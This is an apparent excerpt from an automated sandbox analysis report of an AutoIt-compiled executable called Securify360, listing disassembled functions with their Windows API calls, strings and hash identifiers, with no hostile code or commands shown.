                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: 82098a2737d23d538146487cbd631cf21bd5a4348d4c652990c10ee1e87b78ac
                                                                                              • Instruction ID: 3fe8487f8456e7dbb514db2a4945802d91c607d66b5c4f81bd711abfe9f4f8d6
                                                                                              • Opcode Fuzzy Hash: 82098a2737d23d538146487cbd631cf21bd5a4348d4c652990c10ee1e87b78ac
                                                                                              • Instruction Fuzzy Hash: 64214B71D00308AFEB319FA4ED09B9E7BB4FB08750F50415AF584A6298D7BB5950AF84
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00FA4E22
                                                                                              • KillTimer.USER32(?,00000001), ref: 00FA4E4C
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA4E6F
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA4E7A
                                                                                              • CreatePopupMenu.USER32 ref: 00FA4E8E
                                                                                              • PostQuitMessage.USER32(00000000), ref: 00FA4EAF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: TaskbarCreated
                                                                                              • API String ID: 129472671-2362178303
                                                                                              • Opcode ID: 9614e153c2a83ee2f1258a7c55a1b0970f0bb97224c20110bde247adb25741d2
                                                                                              • Instruction ID: 8d3b10005b8698ba8b84be4ff5982b4448f9eb227325d72fcc9ff0cf997ea813
                                                                                              • Opcode Fuzzy Hash: 9614e153c2a83ee2f1258a7c55a1b0970f0bb97224c20110bde247adb25741d2
                                                                                              • Instruction Fuzzy Hash: 65413BB2A40345ABDF355F28DC89B7F7655FBC2310F500115F9819118ACAFAAC50FB61
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F9ADE1
                                                                                              • CoUninitialize.COMBASE ref: 00F9AE80
                                                                                              • UnregisterHotKey.USER32(?), ref: 00F9AFD7
                                                                                              • DestroyWindow.USER32(?), ref: 00FD2F64
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00FD2FC9
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD2FF6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                              • String ID: close all
                                                                                              • API String ID: 469580280-3243417748
                                                                                              • Opcode ID: 566e44a6d0706a856db0caf70781594c1ae807889a1f76222a4a6ab00b7ff29b
                                                                                              • Instruction ID: f1741da68eec38a30ce314d68c81c9c21ae816376998f6d62cc81f1788ae56cf
                                                                                              • Opcode Fuzzy Hash: 566e44a6d0706a856db0caf70781594c1ae807889a1f76222a4a6ab00b7ff29b
                                                                                              • Instruction Fuzzy Hash: F0A1CE717012228FDB29EF10C898B69F365BF04714F1442ADF90AAB351CB35AD12EF91
                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FE0C5B
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                              • _memset.LIBCMT ref: 00FA5787
                                                                                              • _wcscpy.LIBCMT ref: 00FA57DB
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA57EB
                                                                                              • __swprintf.LIBCMT ref: 00FE0CD1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                              • String ID: Line %d: $AutoIt -
                                                                                              • API String ID: 230667853-4094128768
                                                                                              • Opcode ID: 98000e8fc541c5a89cc5a32ca3cb5214229b78d68c304290fcd6a7837e08e5e7
                                                                                              • Instruction ID: d8ad38bf7706f1f75b4b5b9b600371b174b741ac23807cd4047ed40cefa170c8
                                                                                              • Opcode Fuzzy Hash: 98000e8fc541c5a89cc5a32ca3cb5214229b78d68c304290fcd6a7837e08e5e7
                                                                                              • Instruction Fuzzy Hash: 9341A1B1508304AAC321EB64DC85BEF77ECAF45360F10061EF58592091EF78A649EB93
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FF7698
                                                                                                • Part of subcall function 00FB0FE6: std::exception::exception.LIBCMT ref: 00FB101C
                                                                                                • Part of subcall function 00FB0FE6: __CxxThrowException@8.LIBCMT ref: 00FB1031
                                                                                              • ReadFile.KERNELBASE(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FF76CF
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00FF76EB
                                                                                              • _memmove.LIBCMT ref: 00FF7739
                                                                                              • _memmove.LIBCMT ref: 00FF7756
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00FF7765
                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FF777A
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF7799
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 256516436-0
                                                                                              • Opcode ID: df9362946057c4a8e01eac112abff8b62e03902d85c4d422a7785507194aa23f
                                                                                              • Instruction ID: c559964bce83e4553475317216b3c5cc5c3c5440cc659472b2100d9225019277
                                                                                              • Opcode Fuzzy Hash: df9362946057c4a8e01eac112abff8b62e03902d85c4d422a7785507194aa23f
                                                                                              • Instruction Fuzzy Hash: 4731A332904209EFCB20EF55DC85EAFB778FF45310B2440A5F904AB24ADB359E14DB60
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA5109
                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA512A
                                                                                              • ShowWindow.USER32(00000000), ref: 00FA513E
                                                                                              • ShowWindow.USER32(00000000), ref: 00FA5147
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
                                                                                              • Opcode ID: 18662e910d083077b174fe603c002224271cfd664e3b5286940b601843e5a198
                                                                                              • Instruction ID: 9bc0b154d56c7910c13d94f93c04a9409eab3ee8a78f715050c4414df147789c
                                                                                              • Opcode Fuzzy Hash: 18662e910d083077b174fe603c002224271cfd664e3b5286940b601843e5a198
                                                                                              • Instruction Fuzzy Hash: 54F0FE71A413947EEB315A27AC4CE373E7DE7C6F90F50011EF944A6158C6BA1851EBB0
                                                                                              APIs
                                                                                                • Part of subcall function 00FA4A8C: _fseek.LIBCMT ref: 00FA4AA4
                                                                                                • Part of subcall function 00FF9CF1: _wcscmp.LIBCMT ref: 00FF9DE1
                                                                                                • Part of subcall function 00FF9CF1: _wcscmp.LIBCMT ref: 00FF9DF4
                                                                                              • _free.LIBCMT ref: 00FF9C5F
                                                                                              • _free.LIBCMT ref: 00FF9C66
                                                                                              • _free.LIBCMT ref: 00FF9CD1
                                                                                                • Part of subcall function 00FB2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00FB9C54,00000000,00FB8D5D,00FB59C3,?), ref: 00FB2F99
                                                                                                • Part of subcall function 00FB2F85: GetLastError.KERNEL32(00000000,?,00FB9C54,00000000,00FB8D5D,00FB59C3,?), ref: 00FB2FAB
                                                                                              • _free.LIBCMT ref: 00FF9CD9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                              • API String ID: 1552873950-2806939583
                                                                                              • Opcode ID: 79ffa71ae77a183ef4aa62231628ec4741f8a9b8a6cf8a62369e556005f1054f
                                                                                              • Instruction ID: 2a149494dd8ca8011b47373094cbbb4a43068fbcecae0583d94d89c7b38979c2
                                                                                              • Opcode Fuzzy Hash: 79ffa71ae77a183ef4aa62231628ec4741f8a9b8a6cf8a62369e556005f1054f
                                                                                              • Instruction Fuzzy Hash: 3C513CB1D04219ABDB249F65DC41BAEBBB9FF48304F00009EF649A3251DB755E809F58
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 1559183368-0
                                                                                              • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                              • Instruction ID: 90d41756002963a05f3caf36776a8e958cc5495a9abd3ebd8abb8ef52d14a967
                                                                                              • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                              • Instruction Fuzzy Hash: FF51B771F00B09DBDB249E6AC8807EE77A6AF40B30F344729F825961D0DB789D51AF40
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F952E6
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F9534A
                                                                                              • TranslateMessage.USER32(?), ref: 00F95356
                                                                                              • DispatchMessageW.USER32(?), ref: 00F95360
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1795658109-0
                                                                                              • Opcode ID: 0dc3a0034b2557513dcd05cb148df5c7be21b36a1fdb7e7b9b31b1fc3db8781a
                                                                                              • Instruction ID: 7dfce4e0282fe27b1797b7f954c43fcd4611346a2a36815552fcd29869c4a09b
                                                                                              • Opcode Fuzzy Hash: 0dc3a0034b2557513dcd05cb148df5c7be21b36a1fdb7e7b9b31b1fc3db8781a
                                                                                              • Instruction Fuzzy Hash: 4D314631D00B069BFF328A74D845FBA37E9AB01B54F64006DF492971C4D3BA9889FB12
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F91275,SwapMouseButtons,00000004,?), ref: 00F912A8
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F91275,SwapMouseButtons,00000004,?), ref: 00F912C9
                                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00F91275,SwapMouseButtons,00000004,?), ref: 00F912EB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Control Panel\Mouse
                                                                                              • API String ID: 3677997916-824357125
                                                                                              • Opcode ID: 0bcd0f3c16042df06a9dab9eebdb00a897d655423c6abe8c70f96a143a279688
                                                                                              • Instruction ID: d925192fb87a9901227045d4aa51741a396fa438ea6db8ada2707a2bea53ce40
                                                                                              • Opcode Fuzzy Hash: 0bcd0f3c16042df06a9dab9eebdb00a897d655423c6abe8c70f96a143a279688
                                                                                              • Instruction Fuzzy Hash: FB115A71A10209BFEF218FA5D884EAFBBB8FF04750F104569F845E7204D2319E40ABA0
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FA5B58
                                                                                                • Part of subcall function 00FA56F8: _memset.LIBCMT ref: 00FA5787
                                                                                                • Part of subcall function 00FA56F8: _wcscpy.LIBCMT ref: 00FA57DB
                                                                                                • Part of subcall function 00FA56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA57EB
                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00FA5BAD
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA5BBC
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FE0D7C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1378193009-0
                                                                                              • Opcode ID: 034dcfb99d06f2700229bea5288d05d0702576f2e62dffeb67361a3a177119ff
                                                                                              • Instruction ID: 6370b3467139d59b804a201a9eaf8a1f447543b2c7c3a701d53a5b7c9f179ea6
                                                                                              • Opcode Fuzzy Hash: 034dcfb99d06f2700229bea5288d05d0702576f2e62dffeb67361a3a177119ff
                                                                                              • Instruction Fuzzy Hash: 72210AB0D047849FE7728B649C95BEBBBECAF02718F04008DF6D956245CB7529C4EB51
                                                                                              APIs
                                                                                                • Part of subcall function 00FA49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00FA27AF,?,00000001), ref: 00FA49F4
                                                                                              • _free.LIBCMT ref: 00FDFB04
                                                                                              • _free.LIBCMT ref: 00FDFB4B
                                                                                                • Part of subcall function 00FA29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA2ADF
                                                                                              Strings
                                                                                              • Bad directive syntax error, xrefs: 00FDFB33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                              • String ID: Bad directive syntax error
                                                                                              • API String ID: 2861923089-2118420937
                                                                                              • Opcode ID: c4b8f22612af100d80d873a1bb2c23c1e076e0e3535ac9261b2e55a68c780a9a
                                                                                              • Instruction ID: bd8753a611b1fb9f6ee097d0fd5f58c6391079e1af030862b900b6a99438421e
                                                                                              • Opcode Fuzzy Hash: c4b8f22612af100d80d873a1bb2c23c1e076e0e3535ac9261b2e55a68c780a9a
                                                                                              • Instruction Fuzzy Hash: D9916D71D10219AFCF14EFA4CC919EDB7B5BF05310F14452AF816AB2A1DB38AA09EB50
                                                                                              APIs
                                                                                                • Part of subcall function 00FA4AB2: __fread_nolock.LIBCMT ref: 00FA4AD0
                                                                                              • _wcscmp.LIBCMT ref: 00FF9DE1
                                                                                              • _wcscmp.LIBCMT ref: 00FF9DF4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscmp$__fread_nolock
                                                                                              • String ID: FILE
                                                                                              • API String ID: 4029003684-3121273764
                                                                                              • Opcode ID: 196b1a8802b7e04784abd58d4d71a4478ab5d693832ad1f3bb7727ec97b31ca2
                                                                                              • Instruction ID: 3592884680e6883dd7c529e3554de05c5d0181f48712be3c4a6b1d36a44a97cd
                                                                                              • Opcode Fuzzy Hash: 196b1a8802b7e04784abd58d4d71a4478ab5d693832ad1f3bb7727ec97b31ca2
                                                                                              • Instruction Fuzzy Hash: 2F41E672A44209BADF21DEA4CC45FEF77BDDF85710F00046AFA01E7290DAB9AD059B64
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FE032B
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00FE0375
                                                                                                • Part of subcall function 00FB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA2A58,?,00008000), ref: 00FB02A4
                                                                                                • Part of subcall function 00FB09C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB09E4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                                              • String ID: X
                                                                                              • API String ID: 3777226403-3081909835
                                                                                              • Opcode ID: 1bbf05f093eece1f0e7d728e4460c2a7f198da0039d71a2dbc5f0f8047cffe7b
                                                                                              • Instruction ID: 3ef012e092cbd6794d32141bb7fdc41fe9e0df57a214a0be32bc1dcd2876b4ad
                                                                                              • Opcode Fuzzy Hash: 1bbf05f093eece1f0e7d728e4460c2a7f198da0039d71a2dbc5f0f8047cffe7b
                                                                                              • Instruction Fuzzy Hash: 8321F671A002889BCF51DF94CC45BEE7BF8AF49304F00405AF404A7241DBB99A88EFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 09d05bed176d3f59b148898be3033fba75041caa01d7083a7bfaddde8dee183d
                                                                                              • Instruction ID: b43c202c9702ddf26d27005f47675a402e22e44363380613fedb355cc784c97f
                                                                                              • Opcode Fuzzy Hash: 09d05bed176d3f59b148898be3033fba75041caa01d7083a7bfaddde8dee183d
                                                                                              • Instruction Fuzzy Hash: 5CF159705083019FD715DFA8C880A6ABBE5FF88314F14896EF8999B391DB34E945CF92
                                                                                              APIs
                                                                                                • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB07EC
                                                                                                • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB07F4
                                                                                                • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB07FF
                                                                                                • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB080A
                                                                                                • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB0812
                                                                                                • Part of subcall function 00FB07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB081A
                                                                                                • Part of subcall function 00FAFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F9AC6B), ref: 00FAFFA7
                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F9AD08
                                                                                              • OleInitialize.OLE32(00000000), ref: 00F9AD85
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00FD2F56
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
